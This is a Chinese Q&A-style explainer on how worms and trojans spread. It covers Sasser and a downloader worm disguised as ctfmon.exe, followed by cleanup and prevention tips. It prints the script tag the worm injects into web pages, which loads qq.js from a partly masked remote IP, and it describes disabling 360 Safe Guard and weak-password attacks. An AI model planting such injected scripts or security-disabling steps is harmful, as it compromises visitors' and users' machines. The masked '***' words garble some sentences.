蠕虫病毒通过 *** 传播_利用蠕虫传播木马程序

hacker|
199

蠕虫病毒的原理是什么?木马呢

分类: 电脑/ *** 反病毒

解析:

预防 *** 就是及时升级杀毒软件

蠕虫病毒

蠕虫病毒和一般的计算机病毒有着很大的区别,对于它,现在还没有一个成套的理论体系,但是一般认为:蠕虫病毒是一种通过 *** 传播的恶性病毒,它除具有病毒的一些共性外,同时具有自己的一些特征,如不利用文件寄生(有的只存在于内存中),对 *** 造成拒绝服务,以及与黑客技术相结合等等。蠕虫病毒主要的破坏方式是大量的复制自身,然后在 *** 中传播,严重的占用有限的 *** 资源,最终引起整个 *** 的瘫痪,使用户不能通过 *** 进行正常的工作。每一次蠕虫病毒的爆发都会给全球经济造成巨大损失,因此它的危害性是十分巨大的;有一些蠕虫病毒还具有更改用户文件、将用户文件自动当附件转发的功能,更是严重的危害到用户的系统安全。

传播方式:

蠕虫病毒常见的传播方式有2种:

1.利用系统漏洞传播——蠕虫病毒利用计算机系统的设计缺陷,通过 *** 主动的将自己扩散出去。

2.利用电子邮件传播——蠕虫病毒将自己隐藏在电子邮件中,随电子邮件扩散到整个 *** 中,这也是是个人计算机被感染的主要途径。

感染对象:

蠕虫病毒一般不寄生在别的程序中,而多作为一个独立的程序存在,它感染的对象是全 *** 中所有的计算机,并且这种感染是主动进行的,所以总是让人防不胜防。在现今全球 *** 高度发达的情况下,一种蠕虫病毒在几个小时之内蔓延全球并不是什么困难的事情。

病毒典型代表——震荡波

震荡波(Worm.Sasser)病毒仅感染Windows 2000,Windows XP操作系统。病毒发作时,在本地开辟后门,监听TCP 5554端口,做为FTP服务器等待远程控制命令,黑客可以通过这个端口偷窃用户机器的文件和其他信息。同时,病毒开辟128个扫描线程,以本地IP地址为基础,取随机IP地址,疯狂的试探连接445端口,试图利用windows的LSASS 中存在一个缓冲区溢出漏洞进行攻击,一旦攻击成功会导致对方机器感染此病毒并进行下一轮的传播,攻击失败也会造成对方机器的缓冲区溢出,导致对方机器程序非法操作,以及系统异常等。

*** 蠕虫病毒的传播方式

蠕虫一般不采取利用pe格式插入文件的 *** ,而是复制自身在互联网环境下进行传播,病毒的传染能力主要是针对计算机内的文件系统而言,而蠕虫病毒的传染目标是互联网内的所有计算机。局域网条件下的共享文件夹、电子邮件Email、 *** 中的恶意网页、大量存在着漏洞的服务器等,都成为蠕虫传播的良好途径。 *** 的发展也使得蠕虫病毒可以在几个小时内蔓延全球,而且蠕虫的主动攻击性和突然爆发性将使得人们手足无措。 普通病毒 蠕虫病毒 存在形式 寄存文件 独立程序 传染机制 宿主程序运行 主动攻击 传染目标 本地文件 *** 计算机

木马病毒是如何传播的?

木马病毒的入侵和传播手段通常是通过 *** 下载和利用电子邮件。在浏览网页时,木马程序也就有可能下载到计算机缓存中,然后会自行修改你计算机的注册表。

当今, *** 、ICQ、EPH、MSN等 *** 聊天工具地频频出现,这些工具也都具备文件传输功能,这样很容易传播木马和病毒文件。

一些系统自身的漏洞也会为木马病毒入侵和传播提供便利的条件哦~

除此之外,还有一些新的入侵手段:基于DLL和远程线程插入的木马植入、利用蠕虫病毒传播木马等。

防范:使用防火墙阻止木马入侵并及时使用专业的杀毒软件来查杀木马病毒

ctfmon.exe的病毒行为

感染虫下载器45056Win32.Troj.Downloader.c.45056

这是一个蠕虫病毒。(蠕虫病毒比以前少了很多,但对局域网的影响会很大)

该病毒运行后,会指定的 *** 上下载病毒程序,并且会搜索局域网内机器,以弱口令进行尝试性连接

一旦连接成功,则判断该机器弱口令是否有足够的权限,有则向该远程机器发送恶意数据,然后利用windows漏洞来下载程序,予以执行.

⒈病毒运行后,产生以下病毒文件

%WINDIR%\ SYSTEM32\tmipo.bat

%WINDIR%\ SYSTEM32\taimpo.txt

⒉添加病毒启动项

启动项名:svchost对应路径:%Documents and Settings%\Administrator\桌面\ctfmon.exe

⒊病毒会触发taimpo.bat病毒文件,用来关闭360安全卫士,使用户的安全性能降低.

⒋病毒会检测连接的远程机器,当远程机器的登录木马是弱口令时,则会对该机器进行攻击,最后下载adi.vbs到用户机器上.

⒌遍历磁盘,查找*.htm、*.PHP、*.ASP等网页文件,开始感染,插入一段 *** 代码:

script language=javascript src=.**.**.248/qq.js

这段脚本病毒,可能会被用作下载更多的木马程序,利用蠕虫攻击传播,利用下载器种植木马,是目前黑客偷东西惯用的手法。

解决方案:

怕麻烦直接去下载专杀工具:

⒈删除病毒生成的三个文件,可使用清理专家的文件粉碎器完成操作。

%WINDIR%\ SYSTEM32\tmipo.bat (%WINDIR%缺省是c:\windows目录)

%WINDIR%\ SYSTEM32\taimpo.txt

%Documents and Settings%\Administrator\桌面\ctfmon.exe(伪装成输入法的程序名)

⒉使用金山卫士的修复功能,将病毒添加的注册表启动项删除。

防范措施:

⒈最最重要的,是给系统打补丁,登录系统一定要使用口令,就算是电脑只有自己一个人用,也需要安全的登录口令,口令不能太简单,以免被远程攻击工具猜解。(因为只要电脑接入互联网,就能给木马以机会.)

其它方案基本是相通的,不在缀述!

中毒后的解决办法

将杀毒软件升级到最近版本进行查杀,如果查杀完毕后发现输入法无法正常使用的情况,请下载附件中的文件,将其解压后复制到“C:\Windows\system32\” 文件夹即可解决。

备注:如果 ctfmon.exe 位于在目录 C:\Windows下,那么威胁危险度是 70%。文件大小是 2,811,732 字节 (占总出现比率 37%),20,062 字节,50,670 字节,18,353 字节,95,744 字节。应用程序是不可见的。这是个不知名的文件存放于 Windows 目录。这个不是 Windows 核心文件。没有进程的相关资料。ctfmon.exe 是有能力可以 隐藏自身,监控应用程序。

0条大神的评论

发表评论